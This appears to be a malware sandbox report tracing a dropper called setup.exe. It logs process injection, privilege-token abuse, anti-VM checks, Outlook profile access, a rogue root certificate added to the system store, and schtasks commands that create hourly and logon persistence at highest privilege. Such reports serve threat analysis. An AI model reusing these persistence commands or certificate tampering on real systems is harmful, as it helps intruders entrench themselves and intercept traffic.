\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 RegAsm.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 RegAsm.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5100 setup.exe 5100 setup.exe 1776 cixV_nkGTkopkK6M3bv5q2yU.exe 1776 cixV_nkGTkopkK6M3bv5q2yU.exe 4544 yKsQAHMXBlFSnpcJZJgnuybp.exe 4544 yKsQAHMXBlFSnpcJZJgnuybp.exe 1004 powershell.exe 1004 powershell.exe 1004 powershell.exe 4876 Pof_I6pUWTD4eui60EvOnmQb.exe 4876 Pof_I6pUWTD4eui60EvOnmQb.exe 3864 Ko6SGc1F2vn2SEMSaKcFkL1o.exe 3864 Ko6SGc1F2vn2SEMSaKcFkL1o.exe 2556 powershell.exe 2556 powershell.exe 2556 powershell.exe 2180 LPlVCrUtq4IcBRge6e7zsGdp.exe 2180 LPlVCrUtq4IcBRge6e7zsGdp.exe 4736 RegAsm.exe 4736 RegAsm.exe 2820 powershell.exe 2820 powershell.exe 4736 RegAsm.exe 4736 RegAsm.exe 2820 powershell.exe 916 powershell.exe 916 powershell.exe 916 powershell.exe 4544 yKsQAHMXBlFSnpcJZJgnuybp.exe 4544 yKsQAHMXBlFSnpcJZJgnuybp.exe 4544 yKsQAHMXBlFSnpcJZJgnuybp.exe 4544 yKsQAHMXBlFSnpcJZJgnuybp.exe 4544 yKsQAHMXBlFSnpcJZJgnuybp.exe 4544 yKsQAHMXBlFSnpcJZJgnuybp.exe 4876 Pof_I6pUWTD4eui60EvOnmQb.exe 4876 Pof_I6pUWTD4eui60EvOnmQb.exe 4544 yKsQAHMXBlFSnpcJZJgnuybp.exe 4544 yKsQAHMXBlFSnpcJZJgnuybp.exe 4736 RegAsm.exe 4736 RegAsm.exe 4664 MsBuild.exe 4664 MsBuild.exe 804 bkqtzupkspiy.exe 804 bkqtzupkspiy.exe 804 bkqtzupkspiy.exe 804 bkqtzupkspiy.exe 804 bkqtzupkspiy.exe 804 bkqtzupkspiy.exe 804 bkqtzupkspiy.exe 804 bkqtzupkspiy.exe 3464 powershell.exe 3464 powershell.exe 3464 powershell.exe 5652 msedge.exe 5652 msedge.exe 5668 msedge.exe 5668 msedge.exe 5696 msedge.exe 5696 msedge.exe 1004 msedge.exe 1004 msedge.exe 6276 amert.exe 6276 amert.exe 2456 explorha.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1004 powershell.exe Token: SeDebugPrivilege 2556 powershell.exe Token: SeDebugPrivilege 4664 MsBuild.exe Token: SeBackupPrivilege 4664 MsBuild.exe Token: SeSecurityPrivilege 4664 MsBuild.exe Token: SeSecurityPrivilege 4664 MsBuild.exe Token: SeSecurityPrivilege 4664 MsBuild.exe Token: SeSecurityPrivilege 4664 MsBuild.exe Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 916 powershell.exe Token: SeShutdownPrivilege 2520 powercfg.exe Token: SeCreatePagefilePrivilege 2520 powercfg.exe Token: SeShutdownPrivilege 4572 powercfg.exe Token: SeCreatePagefilePrivilege 4572 powercfg.exe Token: SeShutdownPrivilege 4972 powercfg.exe Token: SeCreatePagefilePrivilege 4972 powercfg.exe Token: SeShutdownPrivilege 4396 powercfg.exe Token: SeCreatePagefilePrivilege 4396 powercfg.exe Token: SeDebugPrivilege 4736 RegAsm.exe Token: SeLockMemoryPrivilege 4108 svchost.exe Token: SeShutdownPrivilege 4272 powercfg.exe Token: SeCreatePagefilePrivilege 4272 powercfg.exe Token: SeShutdownPrivilege 2556 powercfg.exe Token: SeCreatePagefilePrivilege 2556 powercfg.exe Token: SeShutdownPrivilege 2576 powercfg.exe Token: SeCreatePagefilePrivilege 2576 powercfg.exe Token: SeShutdownPrivilege 1224 powercfg.exe Token: SeCreatePagefilePrivilege 1224 powercfg.exe Token: SeDebugPrivilege 3464 powershell.exe Token: SeIncreaseQuotaPrivilege 4376 WMIC.exe Token: SeSecurityPrivilege 4376 WMIC.exe Token: SeTakeOwnershipPrivilege 4376 WMIC.exe Token: SeLoadDriverPrivilege 4376 WMIC.exe Token: SeSystemProfilePrivilege 4376 WMIC.exe Token: SeSystemtimePrivilege 4376 WMIC.exe Token: SeProfSingleProcessPrivilege 4376 WMIC.exe Token: SeIncBasePriorityPrivilege 4376 WMIC.exe Token: SeCreatePagefilePrivilege 4376 WMIC.exe Token: SeBackupPrivilege 4376 WMIC.exe Token: SeRestorePrivilege 4376 WMIC.exe Token: SeShutdownPrivilege 4376 WMIC.exe Token: SeDebugPrivilege 4376 WMIC.exe Token: SeSystemEnvironmentPrivilege 4376 WMIC.exe Token: SeRemoteShutdownPrivilege 4376 WMIC.exe Token: SeUndockPrivilege 4376 WMIC.exe Token: SeManageVolumePrivilege 4376 WMIC.exe Token: 33 4376 WMIC.exe Token: 34 4376 WMIC.exe Token: 35 4376 WMIC.exe Token: 36 4376 WMIC.exe Token: SeIncreaseQuotaPrivilege 4376 WMIC.exe Token: SeSecurityPrivilege 4376 WMIC.exe Token: SeTakeOwnershipPrivilege 4376 WMIC.exe Token: SeLoadDriverPrivilege 4376 WMIC.exe Token: SeSystemProfilePrivilege 4376 WMIC.exe Token: SeSystemtimePrivilege 4376 WMIC.exe Token: SeProfSingleProcessPrivilege 4376 WMIC.exe Token: SeIncBasePriorityPrivilege 4376 WMIC.exe Token: SeCreatePagefilePrivilege 4376 WMIC.exe Token: SeBackupPrivilege 4376 WMIC.exe Token: SeRestorePrivilege 4376 WMIC.exe Token: SeShutdownPrivilege 4376 WMIC.exe Token: SeDebugPrivilege 4376 WMIC.exe Token: SeSystemEnvironmentPrivilege 4376 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 704 6wbSPhvgKkCnr8XAmJUX.exe 704 6wbSPhvgKkCnr8XAmJUX.exe 704 6wbSPhvgKkCnr8XAmJUX.exe 704 6wbSPhvgKkCnr8XAmJUX.exe 704 6wbSPhvgKkCnr8XAmJUX.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 6276 amert.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 704 6wbSPhvgKkCnr8XAmJUX.exe 704 6wbSPhvgKkCnr8XAmJUX.exe 704 6wbSPhvgKkCnr8XAmJUX.exe 704 6wbSPhvgKkCnr8XAmJUX.exe 704 6wbSPhvgKkCnr8XAmJUX.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 1004 msedge.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe 6956 f7da420337.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2180 LPlVCrUtq4IcBRge6e7zsGdp.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5100 wrote to memory of 1776 5100 setup.exe 100 PID 5100 wrote to memory of 1776 5100 setup.exe 100 PID 5100 wrote to memory of 1776 5100 setup.exe 100 PID 5100 wrote to memory of 3864 5100 setup.exe 99 PID 5100 wrote to memory of 3864 5100 setup.exe 99 PID 5100 wrote to memory of 3864 5100 setup.exe 99 PID 5100 wrote to memory of 912 5100 setup.exe 101 PID 5100 wrote to memory of 912 5100 setup.exe 101 PID 5100 wrote to memory of 912 5100 setup.exe 101 PID 5100 wrote to memory of 1752 5100 setup.exe 98 PID 5100 wrote to memory of 1752 5100 setup.exe 98 PID 5100 wrote to memory of 1752 5100 setup.exe 98 PID 5100 wrote to memory of 1432 5100 setup.exe 103 PID 5100 wrote to memory of 1432 5100 setup.exe 103 PID 5100 wrote to memory of 1432 5100 setup.exe 103 PID 5100 wrote to memory of 4876 5100 setup.exe 102 PID 5100 wrote to memory of 4876 5100 setup.exe 102 PID 5100 wrote to memory of 4876 5100 setup.exe 102 PID 5100 wrote to memory of 1952 5100 setup.exe 105 PID 5100 wrote to memory of 1952 5100 setup.exe 105 PID 5100 wrote to memory of 1952 5100 setup.exe 105 PID 5100 wrote to memory of 3564 5100 setup.exe 106 PID 5100 wrote to memory of 3564 5100 setup.exe 106 PID 5100 wrote to memory of 3564 5100 setup.exe 106 PID 5100 wrote to memory of 2028 5100 setup.exe 104 PID 5100 wrote to memory of 2028 5100 setup.exe 104 PID 5100 wrote to memory of 2028 5100 setup.exe 104 PID 5100 wrote to memory of 4756 5100 setup.exe 109 PID 5100 wrote to memory of 4756 5100 setup.exe 109 PID 5100 wrote to memory of 4756 5100 setup.exe 109 PID 5100 wrote to memory of 4140 5100 setup.exe 108 PID 5100 wrote to memory of 4140 5100 setup.exe 108 PID 5100 wrote to memory of 4140 5100 setup.exe 108 PID 5100 wrote to memory of 4544 5100 setup.exe 107 PID 5100 wrote to memory of 4544 5100 setup.exe 107 PID 5100 wrote to memory of 2180 5100 setup.exe 110 PID 5100 wrote to memory of 2180 5100 setup.exe 110 PID 5100 wrote to memory of 2180 5100 setup.exe 110 PID 1432 wrote to memory of 4736 1432 7HGPq04ymPgj8MAKpQK8ZJRd.exe 111 PID 1432 wrote to memory of 4736 1432 7HGPq04ymPgj8MAKpQK8ZJRd.exe 111 PID 1432 wrote to memory of 4736 1432 7HGPq04ymPgj8MAKpQK8ZJRd.exe 111 PID 2028 wrote to memory of 2632 2028 PxlH0uZgx12a7zus_o6_h8xG.exe 112 PID 2028 wrote to memory of 2632 2028 PxlH0uZgx12a7zus_o6_h8xG.exe 112 PID 2028 wrote to memory of 2632 2028 PxlH0uZgx12a7zus_o6_h8xG.exe 112 PID 1432 wrote to memory of 4736 1432 7HGPq04ymPgj8MAKpQK8ZJRd.exe 111 PID 1432 wrote to memory of 4736 1432 7HGPq04ymPgj8MAKpQK8ZJRd.exe 111 PID 1432 wrote to memory of 4736 1432 7HGPq04ymPgj8MAKpQK8ZJRd.exe 111 PID 1432 wrote to memory of 4736 1432 7HGPq04ymPgj8MAKpQK8ZJRd.exe 111 PID 1432 wrote to memory of 4736 1432 7HGPq04ymPgj8MAKpQK8ZJRd.exe 111 PID 912 wrote to memory of 408 912 upVbA4v1KvTLDndms2No_Axe.exe 113 PID 912 wrote to memory of 408 912 upVbA4v1KvTLDndms2No_Axe.exe 113 PID 912 wrote to memory of 408 912 upVbA4v1KvTLDndms2No_Axe.exe 113 PID 912 wrote to memory of 408 912 upVbA4v1KvTLDndms2No_Axe.exe 113 PID 912 wrote to memory of 408 912 upVbA4v1KvTLDndms2No_Axe.exe 113 PID 912 wrote to memory of 408 912 upVbA4v1KvTLDndms2No_Axe.exe 113 PID 912 wrote to memory of 408 912 upVbA4v1KvTLDndms2No_Axe.exe 113 PID 912 wrote to memory of 408 912 upVbA4v1KvTLDndms2No_Axe.exe 113 PID 912 wrote to memory of 408 912 upVbA4v1KvTLDndms2No_Axe.exe 113 PID 4140 wrote to memory of 2468 4140 oMHmKV4qin2yV3RMkuUNiFFg.exe 115 PID 4140 wrote to memory of 2468 4140 oMHmKV4qin2yV3RMkuUNiFFg.exe 115 PID 4140 wrote to memory of 2468 4140 oMHmKV4qin2yV3RMkuUNiFFg.exe 115 PID 2180 wrote to memory of 3504 2180 LPlVCrUtq4IcBRge6e7zsGdp.exe 116 PID 2180 wrote to memory of 3504 2180 LPlVCrUtq4IcBRge6e7zsGdp.exe 116 PID 2180 wrote to memory of 3504 2180 LPlVCrUtq4IcBRge6e7zsGdp.exe 116 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Pof_I6pUWTD4eui60EvOnmQb.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-17203666-93769886-2545153620-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Pof_I6pUWTD4eui60EvOnmQb.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"1⤵
- Modifies firewall policy service
- Checks computer location settings
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5100 -
C:\Users\Admin\Documents\SimpleAdobe\rz7u8wZ2m7geFP2IusKQRQIP.exeC:\Users\Admin\Documents\SimpleAdobe\rz7u8wZ2m7geFP2IusKQRQIP.exe2⤵
- Executes dropped EXE
PID:1752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile3⤵
- Command and Scripting Interpreter: PowerShell
PID:6988
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\Ko6SGc1F2vn2SEMSaKcFkL1o.exeC:\Users\Admin\Documents\SimpleAdobe\Ko6SGc1F2vn2SEMSaKcFkL1o.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3864
-
-
C:\Users\Admin\Documents\SimpleAdobe\cixV_nkGTkopkK6M3bv5q2yU.exeC:\Users\Admin\Documents\SimpleAdobe\cixV_nkGTkopkK6M3bv5q2yU.exe2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1776
-
-
C:\Users\Admin\Documents\SimpleAdobe\upVbA4v1KvTLDndms2No_Axe.exeC:\Users\Admin\Documents\SimpleAdobe\upVbA4v1KvTLDndms2No_Axe.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:408
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 408 -s 21924⤵
- Program crash
PID:1148
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\Pof_I6pUWTD4eui60EvOnmQb.exeC:\Users\Admin\Documents\SimpleAdobe\Pof_I6pUWTD4eui60EvOnmQb.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:4876 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:5940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6600
-
-
C:\Users\Admin\AppData\Local\Temp\span9JIkdjeLEFNt\EFOewZW4hGAWK7wavcgA.exe"C:\Users\Admin\AppData\Local\Temp\span9JIkdjeLEFNt\EFOewZW4hGAWK7wavcgA.exe"3⤵
- Executes dropped EXE
PID:7104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6236
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6752
-
-
C:\Users\Admin\AppData\Local\Temp\span9JIkdjeLEFNt\NivSqBnMcATygKshf_En.exe"C:\Users\Admin\AppData\Local\Temp\span9JIkdjeLEFNt\NivSqBnMcATygKshf_En.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2744 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:6968
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:5724
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_209ffc424b0966fd64861c7290d2a06a LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:6988
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\7HGPq04ymPgj8MAKpQK8ZJRd.exeC:\Users\Admin\Documents\SimpleAdobe\7HGPq04ymPgj8MAKpQK8ZJRd.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1432 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4736
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\PxlH0uZgx12a7zus_o6_h8xG.exeC:\Users\Admin\Documents\SimpleAdobe\PxlH0uZgx12a7zus_o6_h8xG.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2028 -
C:\Users\Admin\AppData\Local\Temp\is-8SP2Q.tmp\PxlH0uZgx12a7zus_o6_h8xG.tmp"C:\Users\Admin\AppData\Local\Temp\is-8SP2Q.tmp\PxlH0uZgx12a7zus_o6_h8xG.tmp" /SL5="$1300E0,4216309,54272,C:\Users\Admin\Documents\SimpleAdobe\PxlH0uZgx12a7zus_o6_h8xG.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2632 -
C:\Users\Admin\AppData\Local\LameXP\lamexp32.exe"C:\Users\Admin\AppData\Local\LameXP\lamexp32.exe" -i4⤵
- Executes dropped EXE
PID:2944
-
-
C:\Users\Admin\AppData\Local\LameXP\lamexp32.exe"C:\Users\Admin\AppData\Local\LameXP\lamexp32.exe" -s4⤵
- Executes dropped EXE
PID:4028
-
-
-
-
C:\Users\Admin\Documents\SimpleAdobe\cyJLKWRMEWxiogwZ7NScLONr.exeC:\Users\Admin\Documents\SimpleAdobe\cyJLKWRMEWxiogwZ7NScLONr.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1952 -
